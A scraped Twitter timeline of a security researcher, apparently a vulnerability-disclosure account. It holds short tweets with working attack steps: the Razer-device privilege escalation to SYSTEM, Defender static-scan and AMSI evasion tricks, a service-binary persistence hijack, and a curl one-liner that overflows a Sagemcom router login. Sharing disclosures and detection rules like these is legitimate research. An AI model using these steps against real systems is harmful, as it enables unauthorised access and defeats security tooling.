Pinned Tweet

Need local admin and have physical access? - Plug a Razer mouse (or the dongle) - Windows Update will download and execute RazerInstaller as SYSTEM - Abuse elevated Explorer to open Powershell with Shift+Right click Tried contacting

, but no answers. So here's a freebie

1:23

445.7K views

276

5,468

13.8K

Threat intel is true crime stories

3

medium.com/@frycos/pwning Here it is: my blog post for a Pre-Auth RCE on the famous 3CX Phone Management System.

medium.com

Pwning 3CX Phone Management Backends from the Internet

After an unplanned journey with Microsoft Exchange the month before, I started to look for new interesting vulnerability research targets…

13

157

390

How about I open source Nimpackt v1 if y'all get me to 5k followers? 👀

8

31

123

I've published a blogpost on understanding #Sysmon detections on Windows endpoints using a custom attack simulation tool #SysmonSimulator Link to the blogpost-rootdse.org/posts/understa Github-

github.com

GitHub - ScarredMonk/SysmonSimulator: Sysmon event simulation utility which can be used to simulate...

Sysmon event simulation utility which can be used to simulate the attacks to generate the Sysmon Event logs for testing the EDR detections and correlation rules by Blue teams. - GitHub - ScarredMon...

3

180

432

Bypass Defender AV static detection: If you name a malicious file DumpStack.log Defender doesn't scan it.

49

1,219

3,599

Topics to follow

Sign up to get Tweets about the Topics you follow in your Home timeline.

Carousel

"YARA rule match shows CobaltStrike beacon in svchost.exe process memory" Analyst: "I've checked the hash of the executable on Virustotal and it said <trusted>." Me:

GIF

read image description

ALT

30

121

623

IronHusky APT uses zero-day on Windows servers #MysterySnail #PatchTuesday #itw0days

securelist.com

MysterySnail attacks with Windows zero-day

We detected attacks with the use of an elevation of privilege exploit on multiple Microsoft Windows servers. Variants of the malware payload used along with the zero-day exploit were detected in...

4

89

153

jonhat

@j0nh4t

Sep 9, 2021

Rough hack by reversing the samples for CVE-2021-40444. Really interested in seeing how others reproduce this once info comes out

0:16

1.4K views

11

50

Bypass defender with Powershell? Run the same payload twice, yeah, you did read that correctly. Watch. 🙃

1:30

24.8K views

Quote Tweet

Melvin langvik

@Flangvik

· Sep 5, 2021

Okay?? just stumbled into this LIVE during my steam (twitch.tv/flangvik/). If you run a PowerShell payload that gets nuked by Defender (Say an AMSI bypass), and you open a new PowerShell prompt and run it again defender will ignore it? Multiple viewers confirmed...

15

307

842

Cobalt Strike, a Defender's Guide thedfirreport.com/2021/08/29/cob Thanks to

@Kostastsale

for helping put this together! Shout outs to:

,

,

,

,

,

,

,

,

,

, and

.

2

410

774

The Razer & SteelSeries Windows PrivEsc vulns are fun, but there are tons of devices that may be vulnerable. We have a list of ~2500 possible devices! The easiest way to test is to use something like an OMG Cable or BashBunny to spoof the VID/PID. 1/n

8

224

646

This clip of a security control room at Iran's most notorious prison being shut down by hackers is straight out of a movie. Hackers are now leaking stolen CCTV from across the Evin prison to highlight the abuse of inmates, per

@AP

.

2:20

1M views

From

Masih Alinejad

129

4,356

9,998

I thought it would be a good idea to highlight #Razer driver installations that spawn an explorer.exe process (could lead to some FPs but negligible in the corporate envs) Rule github.com/SigmaHQ/sigma/

6

37

117

it is not only about

.. it is possible for all.. just another priv_escalation with

@SteelSeries

0xsp.com/security%20res

1:28

23.8K views

16

242

548

I would like to update that I have been reached out by

@Razer

and ensured that their security team is working on a fix ASAP. Their manner of communication has been professional and I have even been offered a bounty even though publicly disclosing this issue.

19

68

1,152

Windows escalation with an OMG cable: from Guest account to System user! Razer hasn’t fixed this for over a year now. o.mg.lol

0:50

62.8K views

29

407

1,397

Additionally if you go through the installation process and define the save dir to user controllable path like Desktop. A service binary is saved there which can be hijacked for persistance and is executed before user logon on boot.

4

31

707

streamable.com/q2dsji for better quality poc video

5

32

497

Show this thread

jonhat Retweeted

Bucky Rensole.loopring.org

@rensole

Mar 17, 2021

I think this may be the most important DD we have come across so far. anyone interested in what's happening with #gme and how this came to be should read this, NOW! iamnotafinancialadvisor.com/discord/DD/GME

97

1,343

2,467

A tale of EDR bypass methods - s3cur3th1ssh1t.github.io/A-tale-of-EDR- Special thanks to

@_EthicalChaos_

and

@_RastaMouse

for answering all my questions! 🍻

8

295

581

jonhat

@j0nh4t

Jan 14, 2021

Sagemcom F@ST3686 buf overflow. Reported 4 months ago, no fix. Mitigate by changing default IPs & remote management off. p=$(python -c 'print("A"*69)');curl --data "foo" http://192.168.1.1/goform/login?sessionKey=$p Anything over 68 chars overflows, I named it SESSION69 :D

0:55

1.5K views

2

3

26

jonhat’s Tweets

Topics to follow

Carousel